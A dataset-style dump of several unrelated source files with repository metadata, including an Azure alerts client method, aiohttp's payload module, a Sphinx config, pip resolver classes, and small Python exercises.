:param groupby: This parameter allows the result set to be aggregated
by input fields. For example, groupby=severity,alertstate. Possible
values include: 'severity', 'alertState', 'monitorCondition',
'monitorService', 'signalType', 'alertRule'
:type groupby: str or
~azure.mgmt.alertsmanagement.models.AlertsSummaryGroupByFields
:param include_smart_groups_count: Include count of the SmartGroups as
part of the summary. Default value is 'false'.
:type include_smart_groups_count: bool
:param target_resource: Filter by target resource( which is full ARM
ID) Default value is select all.
:type target_resource: str
:param target_resource_type: Filter by target resource type. Default
value is select all.
:type target_resource_type: str
:param target_resource_group: Filter by target resource group name.
Default value is select all.
:type target_resource_group: str
:param monitor_service: Filter by monitor service which is the source
of the alert instance. Default value is select all. Possible values
include: 'Application Insights', 'ActivityLog Administrative',
'ActivityLog Security', 'ActivityLog Recommendation', 'ActivityLog
Policy', 'ActivityLog Autoscale', 'Log Analytics', 'Nagios',
'Platform', 'SCOM', 'ServiceHealth', 'SmartDetector', 'VM Insights',
'Zabbix'
:type monitor_service: str or
~azure.mgmt.alertsmanagement.models.MonitorService
:param monitor_condition: Filter by monitor condition which is the
state of the monitor(alertRule) at monitor service. Default value is
to select all. Possible values include: 'Fired', 'Resolved'
:type monitor_condition: str or
~azure.mgmt.alertsmanagement.models.MonitorCondition
:param severity: Filter by severity. Defaut value is select all.
Possible values include: 'Sev0', 'Sev1', 'Sev2', 'Sev3', 'Sev4'
:type severity: str or ~azure.mgmt.alertsmanagement.models.Severity
:param alert_state: Filter by state of the alert instance. Default
value is to select all. Possible values include: 'New',
'Acknowledged', 'Closed'
:type alert_state: str or
~azure.mgmt.alertsmanagement.models.AlertState
:param alert_rule: Filter by alert rule(monitor) which fired alert
instance. Default value is to select all.
:type alert_rule: str
:param time_range: Filter by time range by below listed values.
Default value is 1 day. Possible values include: '1h', '1d', '7d',
'30d'
:type time_range: str or ~azure.mgmt.alertsmanagement.models.TimeRange
:param custom_time_range: Filter by custom time range in the format
<start-time>/<end-time> where time is in (ISO-8601 format)'.
Permissible values is within 30 days from query time. Either
timeRange or customTimeRange could be used but not both. Default is
none.
:type custom_time_range: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: AlertsSummary or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.alertsmanagement.models.AlertsSummary or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.alertsmanagement.models.ErrorResponseException>`
"""
# Construct URL
url = self.get_summary.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['groupby'] = self._serialize.query("groupby", groupby, 'str')
if include_smart_groups_count is not None:
query_parameters['includeSmartGroupsCount'] = self._serialize.query("include_smart_groups_count", include_smart_groups_count, 'bool')
if target_resource is not None:
query_parameters['targetResource'] = self._serialize.query("target_resource", target_resource, 'str')
if target_resource_type is not None:
query_parameters['targetResourceType'] = self._serialize.query("target_resource_type", target_resource_type, 'str')
if target_resource_group is not None:
query_parameters['targetResourceGroup'] = self._serialize.query("target_resource_group", target_resource_group, 'str')
if monitor_service is not None:
query_parameters['monitorService'] = self._serialize.query("monitor_service", monitor_service, 'str')
if monitor_condition is not None:
query_parameters['monitorCondition'] = self._serialize.query("monitor_condition", monitor_condition, 'str')
if severity is not None:
query_parameters['severity'] = self._serialize.query("severity", severity, 'str')
if alert_state is not None:
query_parameters['alertState'] = self._serialize.query("alert_state", alert_state, 'str')
if alert_rule is not None:
query_parameters['alertRule'] = self._serialize.query("alert_rule", alert_rule, 'str')
if time_range is not None:
query_parameters['timeRange'] = self._serialize.query("time_range", time_range, 'str')
if custom_time_range is not None:
query_parameters['customTimeRange'] = self._serialize.query("custom_time_range", custom_time_range, 'str')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('AlertsSummary', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_summary.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.AlertsManagement/alertsSummary'}
| [
"[email protected]"
] | |
aed0c98fbf2de2b3457c2d0a458ec85581b0f37b | 0b4f8d15b3c0d8e878ef8ec2d0e060499286714f | /myvenv/bin/django-admin.py | 5697592d38a1797b795f9d80e8d0d31ecbd6c707 | [] | no_license | kyounginbaek/Openarena_website | 0f25da947add8a9119c3877b32470f75ba614da5 | 818acce8c9def5f5673cd8dbc8e8d8fff6b1a1ce | refs/heads/master | 2022-10-01T18:45:16.123631 | 2017-07-08T09:21:42 | 2017-07-08T09:21:42 | 62,291,671 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | #!/Users/baekkyoungin/myvenv/bin/python
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"[email protected]"
] | |
637b6f1e6ec46f1d584c268016837a63e14fff30 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/get_20200810155009.py | 13e9a436036562052c378984fa398589f08fdc7a | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,589 | py | def produce(num1,num2):
totalValue = 0
for i in range(abs(num1)):
totalValue +=abs(num2)
if num1 < 0 and num2 > 0:
str1 = str(totalValue)
newStr = "-"+ str1
return int(newStr)
elif num1 > 0 and num2 < 0:
str1 = str(totalValue)
newStr = "-"+ str1
return int(newStr)
else:
return totalValue
# print(produce(2,3))
def findProduct(num):
str1 = str(num)
totalValue = 1
for i in str1:
totalValue *=int(i)
print(totalValue)
# 4513 = 4 * 5 * 1 * 3
# A similar way
def getProduct(n):
product = 1
while n != 0:
product *= n %10
n = n // 10
print(product)
def product(num1,num2):
if num2 < 0:
return -product(num1,-num2)
elif num2 == 0 or num1 == 0:
return 0
elif num2 == 1:
print('hh')
print('num1',num1,'num2',num2)
return num1
elif num1 == 1:
print('h')
return num2
else:
print('num1',num1,'num2',num2)
return num1 + product(num1,num2-1)
# print(product(2,3) )
def product1(x,y):
answer = x/(1/y)
print(answer)
# product1(2,3)
# using a while loop
def mult(a,b):
if a == 0 or b == 0:
return 0
result = 0
while abs(b) > 0:
result +=abs(a)
b -=1
if (b < 0 and a > 0 ) or (b > 0 or a < 0):
num = str(result)
num = "-" + num
return int(num)
else:
return result
print(mult(2,3))
| [
"[email protected]"
] | |
54a008ec6f6fc4fcd11984a6970366a36a1b055b | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/0/oz.py | 6e46cf0a68992802596650c2ce6e38fe9a41e517 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'OZ':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
] | |
ac725be804118071e93d65cfe070174d556c8388 | bcc7011cb121e653d831e77206e541675e348337 | /Global_and_Local_Inversions.py | 17fc67eb30ac3008140d41569fefa9ea03994983 | [] | no_license | Built00/Leetcode | 2115c20bf91e9f9226ce952293132bc7a852fe86 | ec3c0d4bd368dd1039f0fed2a07bf89e645a89c3 | refs/heads/master | 2020-11-24T09:12:08.172973 | 2018-03-27T01:23:08 | 2018-03-27T01:23:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | # -*- encoding:utf-8 -*-
# __author__=='Gan'
# We have some permutation A of [0, 1, ..., N - 1], where N is the length of A.
# The number of (global) inversions is the number of i < j with 0 <= i < j < N and A[i] > A[j].
# The number of local inversions is the number of i with 0 <= i < N and A[i] > A[i+1].
# Return true if and only if the number of global inversions is equal to the number of local inversions.
# Example 1:
# Input: A = [1,0,2]
# Output: true
# Explanation: There is 1 global inversion, and 1 local inversion.
# Example 2:
# Input: A = [1,2,0]
# Output: false
# Explanation: There are 2 global inversions, and 1 local inversion.
# Note:
# A will be a permutation of [0, 1, ..., A.length - 1].
# A will have length in range [1, 5000].
# The time limit for this problem has been reduced.
# Leetcode Weekly Contest 69.
# 208 / 208 test cases passed.
# Status: Accepted
# Runtime: 125 ms
class Solution(object):
def isIdealPermutation(self, A):
"""
:type A: List[int]
:rtype: bool
"""
pre_max = float('-inf')
for i in range(len(A) - 2):
pre_max = max(pre_max, A[i])
if pre_max > A[i + 2]:
return False
return True
if __name__ == '__main__':
print(Solution().isIdealPermutation([1, 0, 2]))
print(Solution().isIdealPermutation([1, 2, 0]))
print(Solution().isIdealPermutation([2, 0, 1]))
| [
"[email protected]"
] | |
f1585623443f7ec42f32fddf1b27b2354e75a163 | 297497957c531d81ba286bc91253fbbb78b4d8be | /third_party/python/aiohttp/aiohttp/payload.py | eb38c7cdbc403922eef2eec74dd4c0d01c3bdbb3 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | marco-c/gecko-dev-comments-removed | 7a9dd34045b07e6b22f0c636c0a836b9e639f9d3 | 61942784fb157763e65608e5a29b3729b0aa66fa | refs/heads/master | 2023-08-09T18:55:25.895853 | 2023-08-01T00:40:39 | 2023-08-01T00:40:39 | 211,297,481 | 0 | 0 | NOASSERTION | 2019-09-29T01:27:49 | 2019-09-27T10:44:24 | C++ | UTF-8 | Python | false | false | 12,804 | py | import asyncio
import enum
import io
import json
import mimetypes
import os
import warnings
from abc import ABC, abstractmethod
from itertools import chain
from typing import (
IO,
TYPE_CHECKING,
Any,
ByteString,
Dict,
Iterable,
Optional,
Text,
TextIO,
Tuple,
Type,
Union,
)
from multidict import CIMultiDict
from . import hdrs
from .abc import AbstractStreamWriter
from .helpers import (
PY_36,
content_disposition_header,
guess_filename,
parse_mimetype,
sentinel,
)
from .streams import StreamReader
from .typedefs import JSONEncoder, _CIMultiDict
__all__ = (
"PAYLOAD_REGISTRY",
"get_payload",
"payload_type",
"Payload",
"BytesPayload",
"StringPayload",
"IOBasePayload",
"BytesIOPayload",
"BufferedReaderPayload",
"TextIOPayload",
"StringIOPayload",
"JsonPayload",
"AsyncIterablePayload",
)
TOO_LARGE_BYTES_BODY = 2 ** 20
if TYPE_CHECKING:
from typing import List
class LookupError(Exception):
pass
class Order(str, enum.Enum):
normal = "normal"
try_first = "try_first"
try_last = "try_last"
def get_payload(data: Any, *args: Any, **kwargs: Any) -> "Payload":
return PAYLOAD_REGISTRY.get(data, *args, **kwargs)
def register_payload(
factory: Type["Payload"], type: Any, *, order: Order = Order.normal
) -> None:
PAYLOAD_REGISTRY.register(factory, type, order=order)
class payload_type:
def __init__(self, type: Any, *, order: Order = Order.normal) -> None:
self.type = type
self.order = order
def __call__(self, factory: Type["Payload"]) -> Type["Payload"]:
register_payload(factory, self.type, order=self.order)
return factory
class PayloadRegistry:
"""Payload registry.
note: we need zope.interface for more efficient adapter search
"""
def __init__(self) -> None:
self._first = []
self._normal = []
self._last = []
def get(
self, data: Any, *args: Any, _CHAIN: Any = chain, **kwargs: Any
) -> "Payload":
if isinstance(data, Payload):
return data
for factory, type in _CHAIN(self._first, self._normal, self._last):
if isinstance(data, type):
return factory(data, *args, **kwargs)
raise LookupError()
def register(
self, factory: Type["Payload"], type: Any, *, order: Order = Order.normal
) -> None:
if order is Order.try_first:
self._first.append((factory, type))
elif order is Order.normal:
self._normal.append((factory, type))
elif order is Order.try_last:
self._last.append((factory, type))
else:
raise ValueError(f"Unsupported order {order!r}")
class Payload(ABC):
_default_content_type = "application/octet-stream"
_size = None
def __init__(
self,
value: Any,
headers: Optional[
Union[_CIMultiDict, Dict[str, str], Iterable[Tuple[str, str]]]
] = None,
content_type: Optional[str] = sentinel,
filename: Optional[str] = None,
encoding: Optional[str] = None,
**kwargs: Any,
) -> None:
self._encoding = encoding
self._filename = filename
self._headers = CIMultiDict()
self._value = value
if content_type is not sentinel and content_type is not None:
self._headers[hdrs.CONTENT_TYPE] = content_type
elif self._filename is not None:
content_type = mimetypes.guess_type(self._filename)[0]
if content_type is None:
content_type = self._default_content_type
self._headers[hdrs.CONTENT_TYPE] = content_type
else:
self._headers[hdrs.CONTENT_TYPE] = self._default_content_type
self._headers.update(headers or {})
@property
def size(self) -> Optional[int]:
"""Size of the payload."""
return self._size
@property
def filename(self) -> Optional[str]:
"""Filename of the payload."""
return self._filename
@property
def headers(self) -> _CIMultiDict:
"""Custom item headers"""
return self._headers
@property
def _binary_headers(self) -> bytes:
return (
"".join([k + ": " + v + "\r\n" for k, v in self.headers.items()]).encode(
"utf-8"
)
+ b"\r\n"
)
@property
def encoding(self) -> Optional[str]:
"""Payload encoding"""
return self._encoding
@property
def content_type(self) -> str:
"""Content type"""
return self._headers[hdrs.CONTENT_TYPE]
def set_content_disposition(
self, disptype: str, quote_fields: bool = True, **params: Any
) -> None:
"""Sets ``Content-Disposition`` header."""
self._headers[hdrs.CONTENT_DISPOSITION] = content_disposition_header(
disptype, quote_fields=quote_fields, **params
)
@abstractmethod
async def write(self, writer: AbstractStreamWriter) -> None:
"""Write payload.
writer is an AbstractStreamWriter instance:
"""
class BytesPayload(Payload):
def __init__(self, value: ByteString, *args: Any, **kwargs: Any) -> None:
if not isinstance(value, (bytes, bytearray, memoryview)):
raise TypeError(
"value argument must be byte-ish, not {!r}".format(type(value))
)
if "content_type" not in kwargs:
kwargs["content_type"] = "application/octet-stream"
super().__init__(value, *args, **kwargs)
if isinstance(value, memoryview):
self._size = value.nbytes
else:
self._size = len(value)
if self._size > TOO_LARGE_BYTES_BODY:
if PY_36:
kwargs = {"source": self}
else:
kwargs = {}
warnings.warn(
"Sending a large body directly with raw bytes might"
" lock the event loop. You should probably pass an "
"io.BytesIO object instead",
ResourceWarning,
**kwargs,
)
async def write(self, writer: AbstractStreamWriter) -> None:
await writer.write(self._value)
class StringPayload(BytesPayload):
def __init__(
self,
value: Text,
*args: Any,
encoding: Optional[str] = None,
content_type: Optional[str] = None,
**kwargs: Any,
) -> None:
if encoding is None:
if content_type is None:
real_encoding = "utf-8"
content_type = "text/plain; charset=utf-8"
else:
mimetype = parse_mimetype(content_type)
real_encoding = mimetype.parameters.get("charset", "utf-8")
else:
if content_type is None:
content_type = "text/plain; charset=%s" % encoding
real_encoding = encoding
super().__init__(
value.encode(real_encoding),
encoding=real_encoding,
content_type=content_type,
*args,
**kwargs,
)
class StringIOPayload(StringPayload):
def __init__(self, value: IO[str], *args: Any, **kwargs: Any) -> None:
super().__init__(value.read(), *args, **kwargs)
class IOBasePayload(Payload):
def __init__(
self, value: IO[Any], disposition: str = "attachment", *args: Any, **kwargs: Any
) -> None:
if "filename" not in kwargs:
kwargs["filename"] = guess_filename(value)
super().__init__(value, *args, **kwargs)
if self._filename is not None and disposition is not None:
if hdrs.CONTENT_DISPOSITION not in self.headers:
self.set_content_disposition(disposition, filename=self._filename)
async def write(self, writer: AbstractStreamWriter) -> None:
loop = asyncio.get_event_loop()
try:
chunk = await loop.run_in_executor(None, self._value.read, 2 ** 16)
while chunk:
await writer.write(chunk)
chunk = await loop.run_in_executor(None, self._value.read, 2 ** 16)
finally:
await loop.run_in_executor(None, self._value.close)
class TextIOPayload(IOBasePayload):
def __init__(
self,
value: TextIO,
*args: Any,
encoding: Optional[str] = None,
content_type: Optional[str] = None,
**kwargs: Any,
) -> None:
if encoding is None:
if content_type is None:
encoding = "utf-8"
content_type = "text/plain; charset=utf-8"
else:
mimetype = parse_mimetype(content_type)
encoding = mimetype.parameters.get("charset", "utf-8")
else:
if content_type is None:
content_type = "text/plain; charset=%s" % encoding
super().__init__(
value,
content_type=content_type,
encoding=encoding,
*args,
**kwargs,
)
@property
def size(self) -> Optional[int]:
try:
return os.fstat(self._value.fileno()).st_size - self._value.tell()
except OSError:
return None
async def write(self, writer: AbstractStreamWriter) -> None:
loop = asyncio.get_event_loop()
try:
chunk = await loop.run_in_executor(None, self._value.read, 2 ** 16)
while chunk:
await writer.write(chunk.encode(self._encoding))
chunk = await loop.run_in_executor(None, self._value.read, 2 ** 16)
finally:
await loop.run_in_executor(None, self._value.close)
class BytesIOPayload(IOBasePayload):
@property
def size(self) -> int:
position = self._value.tell()
end = self._value.seek(0, os.SEEK_END)
self._value.seek(position)
return end - position
class BufferedReaderPayload(IOBasePayload):
@property
def size(self) -> Optional[int]:
try:
return os.fstat(self._value.fileno()).st_size - self._value.tell()
except OSError:
return None
class JsonPayload(BytesPayload):
def __init__(
self,
value: Any,
encoding: str = "utf-8",
content_type: str = "application/json",
dumps: JSONEncoder = json.dumps,
*args: Any,
**kwargs: Any,
) -> None:
super().__init__(
dumps(value).encode(encoding),
content_type=content_type,
encoding=encoding,
*args,
**kwargs,
)
if TYPE_CHECKING:
from typing import AsyncIterable, AsyncIterator
_AsyncIterator = AsyncIterator[bytes]
_AsyncIterable = AsyncIterable[bytes]
else:
from collections.abc import AsyncIterable, AsyncIterator
_AsyncIterator = AsyncIterator
_AsyncIterable = AsyncIterable
class AsyncIterablePayload(Payload):
_iter = None
def __init__(self, value: _AsyncIterable, *args: Any, **kwargs: Any) -> None:
if not isinstance(value, AsyncIterable):
raise TypeError(
"value argument must support "
"collections.abc.AsyncIterablebe interface, "
"got {!r}".format(type(value))
)
if "content_type" not in kwargs:
kwargs["content_type"] = "application/octet-stream"
super().__init__(value, *args, **kwargs)
self._iter = value.__aiter__()
async def write(self, writer: AbstractStreamWriter) -> None:
if self._iter:
try:
while True:
chunk = await self._iter.__anext__()
await writer.write(chunk)
except StopAsyncIteration:
self._iter = None
class StreamReaderPayload(AsyncIterablePayload):
def __init__(self, value: StreamReader, *args: Any, **kwargs: Any) -> None:
super().__init__(value.iter_any(), *args, **kwargs)
PAYLOAD_REGISTRY = PayloadRegistry()
PAYLOAD_REGISTRY.register(BytesPayload, (bytes, bytearray, memoryview))
PAYLOAD_REGISTRY.register(StringPayload, str)
PAYLOAD_REGISTRY.register(StringIOPayload, io.StringIO)
PAYLOAD_REGISTRY.register(TextIOPayload, io.TextIOBase)
PAYLOAD_REGISTRY.register(BytesIOPayload, io.BytesIO)
PAYLOAD_REGISTRY.register(BufferedReaderPayload, (io.BufferedReader, io.BufferedRandom))
PAYLOAD_REGISTRY.register(IOBasePayload, io.IOBase)
PAYLOAD_REGISTRY.register(StreamReaderPayload, StreamReader)
PAYLOAD_REGISTRY.register(AsyncIterablePayload, AsyncIterable, order=Order.try_last)
| [
"[email protected]"
] | |
c0e0ba14f5b0d6553e0ab8ea2c7ab3c584612b90 | b65c1f6000af4ddeb7280e7d93bf861fbf1964bc | /docs/conf.py | f738f1816dbe005da47a911e42eba2c58f773d96 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | EricSchles/calc | ef00aaddfec010321867a8287db0a565dbb7985e | eaa1ab227a5a07f5f4f7d2c64a278977cd43cb18 | refs/heads/develop | 2021-01-25T14:33:58.124300 | 2017-10-11T19:29:20 | 2017-10-11T19:29:20 | 72,668,485 | 1 | 0 | null | 2016-11-02T18:17:57 | 2016-11-02T18:17:57 | null | UTF-8 | Python | false | false | 5,864 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# CALC documentation build configuration file, created by
# sphinx-quickstart on Fri Feb 10 12:27:23 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
import os
from recommonmark.parser import CommonMarkParser
from recommonmark.transform import AutoStructify
import sphinx_rtd_theme
DOCS_DIR = os.path.dirname(__file__)
BASE_DIR = os.path.dirname(DOCS_DIR)
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = []
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_parsers = {'.md': CommonMarkParser}
source_suffix = ['.rst', '.md']
# source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'CALC'
copyright = '2017, 18F'
author = '18F'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
VERSION_PY_PATH = os.path.join(BASE_DIR, 'hourglass', 'version.py')
_globs = {}
exec(open(VERSION_PY_PATH).read(), _globs) # nosec
version = _globs['__version__']
del _globs
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = []
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'CALCdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'CALC.tex', 'CALC Documentation',
'18F', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'calc', 'CALC Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'CALC', 'CALC Documentation',
author, 'CALC', 'One line description of project.',
'Miscellaneous'),
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
class PathNotFoundError(Exception):
pass
def resolve_md_url(url):
abspath = os.path.normpath(os.path.join(DOCS_DIR, url))
if not os.path.exists(abspath):
raise PathNotFoundError(
'"{}" is referenced in markdown documentation but "{}" '
'does not exist'.format(url, abspath)
)
return 'https://github.com/18F/calc/tree/develop/docs/' + url
def setup(app):
app.add_config_value('recommonmark_config', {
'url_resolver': resolve_md_url,
}, True)
app.add_transform(AutoStructify)
| [
"[email protected]"
] | |
18b7044e434e0878ff4a74e4acebf367bfd3596e | 1ea36bc61aed79d9ae198350e221c8d6a7073b08 | /venv/Lib/site-packages/pip/_internal/resolution/resolvelib/requirements.py | 813792d12ff37cacd53a4186dfedd722b748684d | [] | no_license | RicardoAltamiranoSanchez/Proyecto_Tienda_virtual_API_7-Sunburts | f3f0b7f166520d3d91832ac13aa0686d7b5211d8 | 4c95220415277f8561740a8da78ef68ff576f1d6 | refs/heads/master | 2023-04-25T23:40:43.804848 | 2021-05-15T16:50:44 | 2021-05-15T16:50:44 | 324,892,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,180 | py | from pip._vendor.packaging.utils import canonicalize_name
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from .base import Requirement, format_name
if MYPY_CHECK_RUNNING:
from pip._vendor.packaging.specifiers import SpecifierSet
from pip._internal.req.req_install import InstallRequirement
from .base import Candidate, CandidateLookup
class ExplicitRequirement(Requirement):
def __init__(self, candidate):
# type: (Candidate) -> None
self.candidate = candidate
def __str__(self):
# type: () -> str
return str(self.candidate)
def __repr__(self):
# type: () -> str
return "{class_name}({candidate!r})".format(
class_name=self.__class__.__name__,
candidate=self.candidate,
)
@property
def project_name(self):
# type: () -> str
# No need to canonicalise - the candidate did this
return self.candidate.project_name
@property
def name(self):
# type: () -> str
# No need to canonicalise - the candidate did this
return self.candidate.name
def format_for_error(self):
# type: () -> str
return self.candidate.format_for_error()
def get_candidate_lookup(self):
# type: () -> CandidateLookup
return self.candidate, None
def is_satisfied_by(self, candidate):
# type: (Candidate) -> bool
return candidate == self.candidate
class SpecifierRequirement(Requirement):
def __init__(self, ireq):
# type: (InstallRequirement) -> None
assert ireq.link is None, "This is a link, not a specifier"
self._ireq = ireq
self._extras = frozenset(ireq.extras)
def __str__(self):
# type: () -> str
return str(self._ireq.req)
def __repr__(self):
# type: () -> str
return "{class_name}({requirement!r})".format(
class_name=self.__class__.__name__,
requirement=str(self._ireq.req),
)
@property
def project_name(self):
# type: () -> str
return canonicalize_name(self._ireq.req.name)
@property
def name(self):
# type: () -> str
return format_name(self.project_name, self._extras)
def format_for_error(self):
# type: () -> str
# Convert comma-separated specifiers into "A, B, ..., F and G"
# This makes the specifier a bit more "human readable", without
# risking a change in meaning. (Hopefully! Not all edge cases have
# been checked)
parts = [s.strip() for s in str(self).split(",")]
if len(parts) == 0:
return ""
elif len(parts) == 1:
return parts[0]
return ", ".join(parts[:-1]) + " and " + parts[-1]
def get_candidate_lookup(self):
# type: () -> CandidateLookup
return None, self._ireq
def is_satisfied_by(self, candidate):
# type: (Candidate) -> bool
assert candidate.name == self.name, \
"Internal issue: Candidate is not for this requirement " \
" {} vs {}".format(candidate.name, self.name)
# We can safely always allow prereleases here since PackageFinder
# already implements the prerelease logic, and would have filtered out
# prerelease candidates if the user does not expect them.
spec = self._ireq.req.specifier
return spec.contains(candidate.version, prereleases=True)
class RequiresPythonRequirement(Requirement):
"""A requirement representing Requires-Python metadata.
"""
def __init__(self, specifier, match):
# type: (SpecifierSet, Candidate) -> None
self.specifier = specifier
self._candidate = match
def __str__(self):
# type: () -> str
return "Python {}".format(self.specifier)
def __repr__(self):
# type: () -> str
return "{class_name}({specifier!r})".format(
class_name=self.__class__.__name__,
specifier=str(self.specifier),
)
@property
def project_name(self):
# type: () -> str
return self._candidate.project_name
@property
def name(self):
# type: () -> str
return self._candidate.name
def format_for_error(self):
# type: () -> str
return str(self)
def get_candidate_lookup(self):
# type: () -> CandidateLookup
if self.specifier.contains(self._candidate.version, prereleases=True):
return self._candidate, None
return None, None
def is_satisfied_by(self, candidate):
# type: (Candidate) -> bool
assert candidate.name == self._candidate.name, "Not Python candidate"
# We can safely always allow prereleases here since PackageFinder
# already implements the prerelease logic, and would have filtered out
# prerelease candidates if the user does not expect them.
return self.specifier.contains(candidate.version, prereleases=True)
| [
"[email protected]"
] | |
800e01d96d0377b922a3b2148405d4d37c964fa3 | 531caac957596fc623e534bce734ef6b45be0b07 | /tests/operators/vector/test_floor_001.py | 350c04c90cd1257905c6cfa67ca849dde2b97a12 | [
"Apache-2.0",
"Zlib",
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"BSD-2-Clause"
] | permissive | wxyhv/akg | 02e64d81bbb84472e0bf1c57a691b688ea743d6e | fc9b6f5b6fa024da89bf90466a815359ca54015d | refs/heads/master | 2023-03-11T02:59:18.472826 | 2021-02-23T07:44:16 | 2021-02-23T07:44:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,368 | py | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
################################################
